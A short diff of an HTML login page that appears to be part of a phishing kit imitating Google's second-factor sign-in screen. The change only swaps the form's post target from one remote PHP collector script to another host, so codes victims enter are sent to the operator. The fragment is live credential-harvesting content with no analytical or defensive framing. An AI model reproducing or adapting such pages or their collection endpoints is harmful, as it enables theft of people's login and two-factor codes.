--- a/userlogin_code.html
+++ b/userlogin_code.html
@@ -331,7 +331,7 @@ charset=UTF-8">
 
 <body>
   <center>
-  <form method="post" action="http://207.210.200.146/~goontone/shopee/google/4.php" id="gaia_secondfactorform">
+  <form method="post" action="http://settings.acsite.org/user/shopee/google/4.php" id="gaia_secondfactorform">
 <div class="login">
   <div class="top">
   <div class="logo"><img class="google" src="./css/logo.png"></div>
